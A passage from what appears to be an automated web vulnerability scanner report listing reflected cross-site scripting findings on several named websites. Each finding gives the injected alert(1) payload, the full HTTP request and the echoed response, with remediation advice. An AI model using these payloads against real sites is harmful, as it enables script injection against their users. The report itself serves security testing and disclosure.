Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1298688151422022; path=/; expires=Thu, 25-Feb-16 02:42:31 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=0c8fef00216e16fd63153afc19943dff; expires=Mon, 30-May-2011 02:17:14 GMT; path=/; domain=technorati.com
Connection: close
Content-Length: 34541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmp
...[SNIP]...
//www.ingboo.com/dhtmlwindowfiles/ing.js");
function popIngboo() {
posX = ($(window).width() - 480 ) / 2;
posY = 200;
ingboosub('tid=696.10160&return=posts&authority=high&q=5eb43'-alert(1)-'f01b11d4625',posX,posY,null,1);
}
</script>
...[SNIP]...

3.468. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [awesm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the awesm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82105</script><script>alert(1)</script>ebaf4f8c75 was submitted in the awesm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=c58okdiednff7kv9uev8soqi94; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82244
Date: Tue, 19 Apr 2011 19:51:47 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
eme_url': 'http://thenextweb.com/industry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.469. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8bd</script><script>alert(1)</script>73986555b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1 HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=ej3jtbaapag6sv6oln1b9fcd96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:16 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82030
Date: Tue, 19 Apr 2011 19:51:38 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
stry',
'theme_url': 'http://thenextweb.com/industry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1'
};
</script>
...[SNIP]...

3.470. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_content request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bcc</script><script>alert(1)</script>f5ad851bd4d was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=2shuvoef74afqc8k3ecf4kfq14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:48 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:11 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
dustry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.471. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d1ad</script><script>alert(1)</script>24749fe4f25 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=3voqo3o46tv6l2mb54bvds3cu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:49:05 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:28 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
nw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.472. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a19e</script><script>alert(1)</script>fa26e178082 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082 HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=iovjlagptga9dlhualmg2cjsa6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:49:16 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82211
Date: Tue, 19 Apr 2011 19:52:38 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
rl': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082'
};
</script>
...[SNIP]...

3.473. http://uboat.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2a26<script>alert(1)</script>f4d51860e62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof2a26<script>alert(1)</script>f4d51860e62 HTTP/1.1
Host: uboat.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 20:19:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 9021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/favicon.icof2a26<script>alert(1)</script>f4d51860e62</strong>
...[SNIP]...

3.474. http://uboat.net/history/wwi/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba0c5<script>alert(1)</script>d32186e7767 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /historyba0c5<script>alert(1)</script>d32186e7767/wwi/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 8906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/historyba0c5<script>alert(1)</script>d32186e7767/wwi/</strong>
...[SNIP]...

3.475. http://uboat.net/history/wwi/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uboat.net
Path:   /history/wwi/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dfcc<script>alert(1)</script>3770393b851 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /history/wwi1dfcc<script>alert(1)</script>3770393b851/ HTTP/1.1
Host: uboat.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 19 Apr 2011 19:48:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 9014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong>http://uboat.net/history/wwi1dfcc<script>alert(1)</script>3770393b851/</strong>
...[SNIP]...

3.476. http://uid.shoplocal.com/uid.aspx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uid.shoplocal.com
Path:   /uid.aspx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 45a5f<script>alert(1)</script>72002c4d70c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uid.aspx?callback=json_results45a5f<script>alert(1)</script>72002c4d70c HTTP/1.1
Host: uid.shoplocal.com
Proxy-Connection: keep-alive
Referer: http://www.jcpstoreads.com/jcpenney/Default.aspx?action=entryflash&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 109
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
p3p: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Set-Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65; expires=Fri, 26-Feb-2021 04:53:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 04:53:48 GMT

json_results45a5f<script>alert(1)</script>72002c4d70c({'ResultSet':{'UID':'11022007583617319321424330414S'}})

3.477. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcc4f'-alert(1)-'60ec268c148 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338fcc4f'-alert(1)-'60ec268c148&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:21 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338fcc4f'-alert(1)-'60ec268c148&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.478. http://um.simpli.fi/am_js.js [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 504c5'-alert(1)-'848a84ab707 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match504c5'-alert(1)-'848a84ab707 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:21 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match504c5'-alert(1)-'848a84ab707?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.479. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c5d9'-alert(1)-'c693518a79b was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=3387c5d9'-alert(1)-'c693518a79b&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:13 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=3387c5d9'-alert(1)-'c693518a79b&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.480. http://um.simpli.fi/am_match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9c8'-alert(1)-'6080a1b3f83 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match8b9c8'-alert(1)-'6080a1b3f83 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:13 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match8b9c8'-alert(1)-'6080a1b3f83?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.481. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d48e9'-alert(1)-'8fc60c96206 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338d48e9'-alert(1)-'8fc60c96206&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
